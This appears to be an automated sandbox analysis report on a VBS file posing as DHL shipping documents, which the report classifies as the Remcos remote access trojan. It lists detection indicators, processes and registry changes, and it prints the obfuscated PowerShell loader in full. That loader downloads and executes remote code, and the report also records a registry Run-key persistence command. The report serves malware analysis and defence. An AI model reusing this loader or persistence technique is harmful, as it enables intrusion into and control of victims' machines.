File name:

awb_DHL_Shipping_documents_delivery_26_05_2025_0000000000000_doc_25.vbs

Full analysis: https://app.any.run/tasks/f506bccb-7d0e-46da-b0e2-387fa64f14ff
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links.

Malware Trends Tracker     >>>
Analysis date: May 26, 2025, 15:35:09
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
auto-reg
remcos
rat
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

734499DF580858F2A3CE0C1A5EE80A51

SHA1:

FE5FCEC5BBCB6C53CB756A32C300801020D4844C

SHA256:

730DDAEE4641F6D6E15733FE2FAF26951A59935A97DF5B0317B8083D42886E82

SSDEEP:

768:uq4x9ndBnFMw26qGhLUotGWfxju4JdbjeofSqZ7icmfy:0nndBnFMwxwWGWNnJpqolUfy

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 2384)

    • Executes malicious content triggered by hijacked COM objects (POWERSHELL)

      • powershell.exe (PID: 2384)

    • Changes the autorun value in the registry

      • reg.exe (PID: 7012)

    • REMCOS has been detected (SURICATA)

      • msiexec.exe (PID: 5260)

    • REMCOS mutex has been found

      • msiexec.exe (PID: 5260)
      • msiexec.exe (PID: 3956)

    • Connects to the CnC server

      • msiexec.exe (PID: 5260)

  • SUSPICIOUS

    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 6028)

    • Gets a collection of all available drive names (SCRIPT)

      • wscript.exe (PID: 6028)

    • Suspicious use of asymmetric encryption in PowerShell

      • wscript.exe (PID: 6028)
      • powershell.exe (PID: 4976)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 6028)
      • powershell.exe (PID: 4976)

    • Returns all items found within a container (POWERSHELL)

      • powershell.exe (PID: 2384)
      • powershell.exe (PID: 3888)
      • powershell.exe (PID: 6048)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 2384)
      • powershell.exe (PID: 3888)
      • powershell.exe (PID: 6048)

    • Retrieves command line args for running process (POWERSHELL)

      • powershell.exe (PID: 2384)
      • powershell.exe (PID: 3888)
      • powershell.exe (PID: 6048)

    • Creates an instance of the specified .NET type (POWERSHELL)

      • powershell.exe (PID: 2384)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 2384)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 2384)
      • powershell.exe (PID: 3888)
      • powershell.exe (PID: 6048)

    • Starts CMD.EXE for commands execution

      • msiexec.exe (PID: 5260)

    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 3888)
      • powershell.exe (PID: 6048)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 1164)

    • Connects to unusual port

      • msiexec.exe (PID: 5260)

    • Application launched itself

      • powershell.exe (PID: 4976)

    • Contacting a server suspected of hosting an CnC

      • msiexec.exe (PID: 5260)

  • INFO

    • Gets or sets the time when the file was last written to (POWERSHELL)

      • powershell.exe (PID: 2384)
      • powershell.exe (PID: 3888)
      • powershell.exe (PID: 6048)

    • Returns hidden items found within a container (POWERSHELL)

      • conhost.exe (PID: 4880)
      • conhost.exe (PID: 2108)
      • conhost.exe (PID: 4696)
      • conhost.exe (PID: 5728)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 2384)
      • powershell.exe (PID: 3888)
      • powershell.exe (PID: 6048)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 2384)
      • powershell.exe (PID: 3888)
      • powershell.exe (PID: 6048)

    • Disables trace logs

      • powershell.exe (PID: 2384)

    • Checks proxy server information

      • powershell.exe (PID: 2384)
      • msiexec.exe (PID: 5260)
      • msiexec.exe (PID: 3956)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 2384)
      • powershell.exe (PID: 3888)
      • powershell.exe (PID: 6048)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 2384)
      • powershell.exe (PID: 3888)
      • powershell.exe (PID: 6048)

    • Manual execution by a user

      • powershell.exe (PID: 3888)
      • powershell.exe (PID: 4976)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 3888)
      • powershell.exe (PID: 6048)

    • Reads security settings of Internet Explorer

      • msiexec.exe (PID: 5260)
      • msiexec.exe (PID: 3956)

    • Launch of the file from Registry key

      • reg.exe (PID: 7012)

    • Reads the software policy settings

      • msiexec.exe (PID: 5260)
      • slui.exe (PID: 4244)

    • Creates files or folders in the user directory

      • msiexec.exe (PID: 5260)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
146
Monitored processes
17
Malicious processes
7
Suspicious processes
1

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe conhost.exe no specs sppextcomobj.exe no specs slui.exe powershell.exe no specs conhost.exe no specs #REMCOS msiexec.exe cmd.exe no specs conhost.exe no specs reg.exe powershell.exe no specs conhost.exe no specs svchost.exe powershell.exe no specs slui.exe no specs #REMCOS msiexec.exe

Process information

PID
CMD
Path
Indicators
Parent process
1164"C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Pridingly" /t REG_EXPAND_SZ /d "%Tilbagebetaling37% -windowstyle 2 $Trihedral=(g`p 'HKCU:\Software\Civilbeskyttelsernes\').'Bagsmkkerne';%Tilbagebetaling37% ($Trihedral)"C:\Windows\SysWOW64\cmd.exemsiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
2108\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2384"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-ChildItem;Get-Service;$Decadic=(gcm A:).CommandType;$Decadic=[String]$Decadic;$Clamative='Saddelgjorde';$Decadic+=':';(n`i -p $Decadic -n Septuagenarianism -value { param ($Minimeringer);$Clamative='Polyunsaturate253';$Hjtideligholdt143=3;$Plumbate='Epicentre';do {$Fjernkendingerne+=$Minimeringer[$Hjtideligholdt143];$Hjtideligholdt143+=4} until(!$Minimeringer[$Hjtideligholdt143])$Fjernkendingerne});(n`i -p $Decadic -n Chivalry -value {param ($Disorganise);.($Wickerworked) ($Disorganise)});ConvertTo-Html;$Bagholdene=Septuagenarianism 'PalNI deReoT ed.UngW';$Bagholdene+=Septuagenarianism 'EkseKnaBArsc UnLSmaIMicEPe,nK mt';$Pebrine=Septuagenarianism ' SaMK mo tazStaimodlen lMitaSem/';$Skattedepartementerne=Septuagenarianism 'Co,TPjklHe scen1 it2';$Lynfryser='Nar[ RanDemeKo TNoe.Ants eEPror PavDomiRs.c ee.elP ,jOBesI atNbegtPolMSh a FeN,ruaEl.gA.tERhiRBiu]Bet:Los:FinSKemeOveCMe,U Kor PaIS lTHusYSp P Srr aiOHettGafO ac M oBlal tr= ug$KanSMulK T aSuitunsTNe e .ed oE PaPM naEphRRedTN.keVr.M NeE anN SiTS aeLayrLasn.onE';$Pebrine+=Septuagenarianism 'Com5 ko.Ci 0 Re Job(YenW imiRenn G d Goo H,wSvesUdv CidN urT S M t1Fil0Pos.Erh0 N.;bep ,uW G.iIndnMo 6Cle4Sk ; nh Syvx ,l6Tvr4Fna;Not NarrErovKom:Bev1Hap3.el7Jas. Op0 Un) E. Ov,GCr,eforc ZekGynokon/Oms2Fi 0fru1E.e0Pe.0 ,h1Ki,0,il1Ald KraF NeiPrirRe,eKrifAn,o orxuni/ Hy1Teg3Skr7Fab.Pel0';$Loaferish209=Septuagenarianism 'C rULegS tueSrsrBl -PsyASymg haeBlnNToat';$Granulomatous=Septuagenarianism ' OkhUndtRgftP opDogs ,o:Akt/Ne,/R.gmBrua ver ovtE tiHjon A sNo m HyaSoutNoieDyrr.atierdaPnepGenrOvei KimOrtaD,f.encc MaoLenmOc,.Ba,bSperM,s/ ypaK,fd Klm Gen .d/SerSGo nGruuTrabTr,nDu.eEucsSc s ule AgsSik.StihReahJorpB w> BahSoltRubtE ep.ous ep:Cir/ A /Pa.sFormHjecF rs arhForiObspEyepGeni Omn ragBoddUndlParhKarlRam.MuscMono Jem Sh/AlmSAnkn .yuP ob L n D ekals HesSpeeCe s Sk.Fugh uhPanp';$Pampsychist=Septuagenarianism 'pal>';$Wickerworked=Septuagenarianism 'spriTraETe.x';$Overjoyousness='Netforbundet';$Mischaracterize='\Blres.Smr';Chivalry (Septuagenarianism 'Cr.$ TjgKyslProoE tbSpyaAfsL.aa:Bior CiE ShGSekisp.nMilAMul9Fod2Hui= Wo$PikEKronPu.vToc:T.paCoupI.pPP eDFinamilTJi,ASti+G,e$PumMSpriLibSSalcrochCenAColRRygaBylcme,TMo,E CiRXaniSkaZ TeE');Chivalry (Septuagenarianism ' um$ SaGC,mLLunoHymb G aLiglUno:PriUBe,nRevd S eK mVI faph,sCroT S a S.TLreISilNGanGFacl .myUns=Pyl$Da G,rgrKina LoNRv,uNskLToloRaeMC aab nTPejOI,tUKasSSpe..opSp,lPArglFl IAl.t Co(Pa $Yi.pDi AFl.MHeap U,s.leY Tecukrh VeI ySPactHys)');Chivalry (Septuagenarianism $Lynfryser);$Granulomatous=$Undevastatingly[0];$foveation=(Septuagenarianism 'Pol$Epig ulYieOR ebWieA W LUko:c cV MaiIntsSteiCroT ElE.alRDeneP nTSkj=.asN cET rWNea- hioinaB KajAmaE ElCDratHa. DroSDelYNe snottSorE ,imdel. St$MamB pra baGP nhUnfOD sLkrodDe eLinN,rye');Chivalry ($foveation);Chivalry (Septuagenarianism 'U,d$ PoVUngilinsP siDi tGlaePrirMileTekt Be.LufHDagebssa ,idUnse V,rslasInf[ ro$ roL Tho M a EufCloeStjrNi iNdlsU fh Bo2 r0Ar,9A h]fo = P $BobPG nePenbG.drMiriEngn,nde');$Anetts=Septuagenarianism 'FilDP ao.arwDetn .elIn oVanaUnfdTraFCa iOpsl Pre';$Jewbird=Septuagenarianism ' Sm$ .eVFo.iG.tsunpiInttBioeAnlrPlueAtltsar.Phi$B sAPosn uteS rt A,t Ins Un. S IAlsnEp v hooEcdk.unePro( Ov$Ki GGigrBrnaMixnTouuUnplhikoMi mD maSkotAu oUdvu rosLa ,una$HypRGreeBurpAagrOpfoad dDgeuligc LotEksoAnnrSamyDov)';$Reproductory=$Regina92;Chivalry (Septuagenarianism ' a$Re GAnelF eoUniB ReAL.zlCat: VePSikeCo.r I NOp i eeT Jar SmIDeocUnd=Daw(UnrTSt.eConsOpstB d-TyrPS iaWe THomhJac tj$MesrSupEHelPpolrM do .dD fkupriCMadtBlyo UlRBray A.)');while (!$pernitric) {Chivalry (Septuagenarianism ' la$ BlgA olRado yebUroaGajlAlk:bidADelx Sketa mPr,e ThnD,v=.pr$ColROkaoMisoMermPuns') ;Chivalry $Jewbird;Chivalry (Septuagenarianism ' ma[UnaTSanh emrIn,e FlA rsD KuIPhoNUr.g Ot.IniTNoohUn r.areScoAS ld ra]Fre:Uig:A rsan.L L,eAlge OpPUbi(ham4Fej0Tig0 ra0.ar)');Chivalry (Septuagenarianism ' Op$Sjag ,uLsjlOBetbVu ABilLUn.:Womp Y.E Smr Pen leIDostFljr UnIScocBig= l(etpT .aEGreS hat Aw-Uk.pPo.aReht,elHSys Pul$ EpRCh EConpBairSeao GuD V UBilCO etCaiokvgR okY .e)') ;Chivalry (Septuagenarianism ' po$Ba.GAnoLYdeOFa bSkoa igLpez:A ahproVBraIC sd AgeprmrPennEngeLan=Pl $apnGCo,L JaoKitBBagaPe LNon:GabT.tieK lrDusRBeaOL wrM,lRTane ovg KnISpuMBe EUpcNS aTMiseBiotagn1Hie4 Co4B t+End+Beb%fra$ anu PrnTrndF.kepr,V HaaRets.retSilaKakt ReiN nNTidgF rLFlaY.bd.In CBaloHiruT,sn.avt') ;$Granulomatous=$Undevastatingly[$Hviderne]}$Cannonry=380548;$Forstaaelsesrammerne=30204;Chivalry (Septuagenarianism 'Usp$ vigK plGraO.akBSkuAHjeLGum:U,su UnNfdsIKorNPrifkileMorrW saSunBp klDefY Un tra=S.l FluG SoenootD a-IceC eoCobNRomT SwEm.gNUd,tNat Uni$,reRLs.E RaP var nvoFatDBrouTilcUncTAleOpleRSynY');Chivalry (Septuagenarianism ' S $ sygDeul FeoHjebOutaRunlU.p: elOU,tvStre.ilrShidStunSeag nte Nis Le syn=Bea La.[ FiS DeyCats S tBiteSkrm,ri.UnpC,oroHrenGnivMole emrRebtTun]For:Rab:TraFIntrOveo omBalBResaTmmsPe.e ,k6Maa4,elS Int alrTiliBevnAn gGi (Vin$Te UKapnStaiStyn VofSpae BlrMa,a HubInflFo yNi.)');Chivalry (Septuagenarianism 'Sel$LatGvveLTa.OIntB traBa LH l: TvHCrovBi iG orArvV rlEkse DeRSew ,o=Udl ul[ N s.crYaraSBa t IneT mM o. ElT ,eeHa X DotCor.Be eFirnSimcMaxoSkrd.riiSenNCabGPa,] S.:gri:Prea ApsAspc coiV nIJou.BaggSureAd.tV nSSolT.niRVa IGaln erG yr(int$P rOMusVAfrEMa,rCanD GoNBalgJocEH xs Ka)');Chivalry (Septuagenarianism 'F i$Jaig OplI eo .hbReba .clGl,:SupEsknkGuns DiTTrarSamaT nASnoRterBEveeRevJSvuDJibeL.ar ilnLepET rsNon2P,n4Bet9Une=Ste$Ka hObsv pI atrLasvDobldise anRTon.DehsLemuFreBTrfS.uatFlurS iiMe.NSamGGro(Pre$StrcAbiaSednMedn PaoLudN pRUdsy Ma,ni $UdrfFreO SuRarbS ,ttDifA RaADivEJ nl iaSReteUnas UnRAr alummSliMU oeS arBenN .dEswa)');Chivalry $Ekstraarbejdernes249;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3888"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-ChildItem;Get-Service;$Decadic=(gcm A:).CommandType;$Decadic=[String]$Decadic;$Clamative='Saddelgjorde';$Decadic+=':';(n`i -p $Decadic -n Septuagenarianism -value { param ($Minimeringer);$Clamative='Polyunsaturate253';$Hjtideligholdt143=3;$Plumbate='Epicentre';do {$Fjernkendingerne+=$Minimeringer[$Hjtideligholdt143];$Hjtideligholdt143+=4} until(!$Minimeringer[$Hjtideligholdt143])$Fjernkendingerne});(n`i -p $Decadic -n Chivalry -value {param ($Disorganise);.($Wickerworked) ($Disorganise)});ConvertTo-Html;$Bagholdene=Septuagenarianism 'PalNI deReoT ed.UngW';$Bagholdene+=Septuagenarianism 'EkseKnaBArsc UnLSmaIMicEPe,nK mt';$Pebrine=Septuagenarianism ' SaMK mo tazStaimodlen lMitaSem/';$Skattedepartementerne=Septuagenarianism 'Co,TPjklHe scen1 it2';$Lynfryser='Nar[ RanDemeKo TNoe.Ants eEPror PavDomiRs.c ee.elP ,jOBesI atNbegtPolMSh a FeN,ruaEl.gA.tERhiRBiu]Bet:Los:FinSKemeOveCMe,U Kor PaIS lTHusYSp P Srr aiOHettGafO ac M oBlal tr= ug$KanSMulK T aSuitunsTNe e .ed oE PaPM naEphRRedTN.keVr.M NeE anN SiTS aeLayrLasn.onE';$Pebrine+=Septuagenarianism 'Com5 ko.Ci 0 Re Job(YenW imiRenn G d Goo H,wSvesUdv CidN urT S M t1Fil0Pos.Erh0 N.;bep ,uW G.iIndnMo 6Cle4Sk ; nh Syvx ,l6Tvr4Fna;Not NarrErovKom:Bev1Hap3.el7Jas. Op0 Un) E. Ov,GCr,eforc ZekGynokon/Oms2Fi 0fru1E.e0Pe.0 ,h1Ki,0,il1Ald KraF NeiPrirRe,eKrifAn,o orxuni/ Hy1Teg3Skr7Fab.Pel0';$Loaferish209=Septuagenarianism 'C rULegS tueSrsrBl -PsyASymg haeBlnNToat';$Granulomatous=Septuagenarianism ' OkhUndtRgftP opDogs ,o:Akt/Ne,/R.gmBrua ver ovtE tiHjon A sNo m HyaSoutNoieDyrr.atierdaPnepGenrOvei KimOrtaD,f.encc MaoLenmOc,.Ba,bSperM,s/ ypaK,fd Klm Gen .d/SerSGo nGruuTrabTr,nDu.eEucsSc s ule AgsSik.StihReahJorpB w> BahSoltRubtE ep.ous ep:Cir/ A /Pa.sFormHjecF rs arhForiObspEyepGeni Omn ragBoddUndlParhKarlRam.MuscMono Jem Sh/AlmSAnkn .yuP ob L n D ekals HesSpeeCe s Sk.Fugh uhPanp';$Pampsychist=Septuagenarianism 'pal>';$Wickerworked=Septuagenarianism 'spriTraETe.x';$Overjoyousness='Netforbundet';$Mischaracterize='\Blres.Smr';Chivalry (Septuagenarianism 'Cr.$ TjgKyslProoE tbSpyaAfsL.aa:Bior CiE ShGSekisp.nMilAMul9Fod2Hui= Wo$PikEKronPu.vToc:T.paCoupI.pPP eDFinamilTJi,ASti+G,e$PumMSpriLibSSalcrochCenAColRRygaBylcme,TMo,E CiRXaniSkaZ TeE');Chivalry (Septuagenarianism ' um$ SaGC,mLLunoHymb G aLiglUno:PriUBe,nRevd S eK mVI faph,sCroT S a S.TLreISilNGanGFacl .myUns=Pyl$Da G,rgrKina LoNRv,uNskLToloRaeMC aab nTPejOI,tUKasSSpe..opSp,lPArglFl IAl.t Co(Pa $Yi.pDi AFl.MHeap U,s.leY Tecukrh VeI ySPactHys)');Chivalry (Septuagenarianism $Lynfryser);$Granulomatous=$Undevastatingly[0];$foveation=(Septuagenarianism 'Pol$Epig ulYieOR ebWieA W LUko:c cV MaiIntsSteiCroT ElE.alRDeneP nTSkj=.asN cET rWNea- hioinaB KajAmaE ElCDratHa. DroSDelYNe snottSorE ,imdel. St$MamB pra baGP nhUnfOD sLkrodDe eLinN,rye');Chivalry ($foveation);Chivalry (Septuagenarianism 'U,d$ PoVUngilinsP siDi tGlaePrirMileTekt Be.LufHDagebssa ,idUnse V,rslasInf[ ro$ roL Tho M a EufCloeStjrNi iNdlsU fh Bo2 r0Ar,9A h]fo = P $BobPG nePenbG.drMiriEngn,nde');$Anetts=Septuagenarianism 'FilDP ao.arwDetn .elIn oVanaUnfdTraFCa iOpsl Pre';$Jewbird=Septuagenarianism ' Sm$ .eVFo.iG.tsunpiInttBioeAnlrPlueAtltsar.Phi$B sAPosn uteS rt A,t Ins Un. S IAlsnEp v hooEcdk.unePro( Ov$Ki GGigrBrnaMixnTouuUnplhikoMi mD maSkotAu oUdvu rosLa ,una$HypRGreeBurpAagrOpfoad dDgeuligc LotEksoAnnrSamyDov)';$Reproductory=$Regina92;Chivalry (Septuagenarianism ' a$Re GAnelF eoUniB ReAL.zlCat: VePSikeCo.r I NOp i eeT Jar SmIDeocUnd=Daw(UnrTSt.eConsOpstB d-TyrPS iaWe THomhJac tj$MesrSupEHelPpolrM do .dD fkupriCMadtBlyo UlRBray A.)');while (!$pernitric) {Chivalry (Septuagenarianism ' la$ BlgA olRado yebUroaGajlAlk:bidADelx Sketa mPr,e ThnD,v=.pr$ColROkaoMisoMermPuns') ;Chivalry $Jewbird;Chivalry (Septuagenarianism ' ma[UnaTSanh emrIn,e FlA rsD KuIPhoNUr.g Ot.IniTNoohUn r.areScoAS ld ra]Fre:Uig:A rsan.L L,eAlge OpPUbi(ham4Fej0Tig0 ra0.ar)');Chivalry (Septuagenarianism ' Op$Sjag ,uLsjlOBetbVu ABilLUn.:Womp Y.E Smr Pen leIDostFljr UnIScocBig= l(etpT .aEGreS hat Aw-Uk.pPo.aReht,elHSys Pul$ EpRCh EConpBairSeao GuD V UBilCO etCaiokvgR okY .e)') ;Chivalry (Septuagenarianism ' po$Ba.GAnoLYdeOFa bSkoa igLpez:A ahproVBraIC sd AgeprmrPennEngeLan=Pl $apnGCo,L JaoKitBBagaPe LNon:GabT.tieK lrDusRBeaOL wrM,lRTane ovg KnISpuMBe EUpcNS aTMiseBiotagn1Hie4 Co4B t+End+Beb%fra$ anu PrnTrndF.kepr,V HaaRets.retSilaKakt ReiN nNTidgF rLFlaY.bd.In CBaloHiruT,sn.avt') ;$Granulomatous=$Undevastatingly[$Hviderne]}$Cannonry=380548;$Forstaaelsesrammerne=30204;Chivalry (Septuagenarianism 'Usp$ vigK plGraO.akBSkuAHjeLGum:U,su UnNfdsIKorNPrifkileMorrW saSunBp klDefY Un tra=S.l FluG SoenootD a-IceC eoCobNRomT SwEm.gNUd,tNat Uni$,reRLs.E RaP var nvoFatDBrouTilcUncTAleOpleRSynY');Chivalry (Septuagenarianism ' S $ sygDeul FeoHjebOutaRunlU.p: elOU,tvStre.ilrShidStunSeag nte Nis Le syn=Bea La.[ FiS DeyCats S tBiteSkrm,ri.UnpC,oroHrenGnivMole emrRebtTun]For:Rab:TraFIntrOveo omBalBResaTmmsPe.e ,k6Maa4,elS Int alrTiliBevnAn gGi (Vin$Te UKapnStaiStyn VofSpae BlrMa,a HubInflFo yNi.)');Chivalry (Septuagenarianism 'Sel$LatGvveLTa.OIntB traBa LH l: TvHCrovBi iG orArvV rlEkse DeRSew ,o=Udl ul[ N s.crYaraSBa t IneT mM o. ElT ,eeHa X DotCor.Be eFirnSimcMaxoSkrd.riiSenNCabGPa,] S.:gri:Prea ApsAspc coiV nIJou.BaggSureAd.tV nSSolT.niRVa IGaln erG yr(int$P rOMusVAfrEMa,rCanD GoNBalgJocEH xs Ka)');Chivalry (Septuagenarianism 'F i$Jaig OplI eo .hbReba .clGl,:SupEsknkGuns DiTTrarSamaT nASnoRterBEveeRevJSvuDJibeL.ar ilnLepET rsNon2P,n4Bet9Une=Ste$Ka hObsv pI atrLasvDobldise anRTon.DehsLemuFreBTrfS.uatFlurS iiMe.NSamGGro(Pre$StrcAbiaSednMedn PaoLudN pRUdsy Ma,ni $UdrfFreO SuRarbS ,ttDifA RaADivEJ nl iaSReteUnas UnRAr alummSliMU oeS arBenN .dEswa)');Chivalry $Ekstraarbejdernes249;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
3956"C:\WINDOWS\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
2
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
4244"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
4696\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4880\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4976c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle 2 $Trihedral=(g`p 'HKCU:\Software\Civilbeskyttelsernes\').'Bagsmkkerne';c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Trihedral)C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
Total events
25 449
Read events
25 431
Write events
18
Delete events
0

Modification events

(PID) Process:(6028) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(6028) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(6028) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(6028) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(5260) msiexec.exeKey:HKEY_CURRENT_USER\SOFTWARE\Civilbeskyttelsernes
Operation:writeName:Bagsmkkerne
Value:
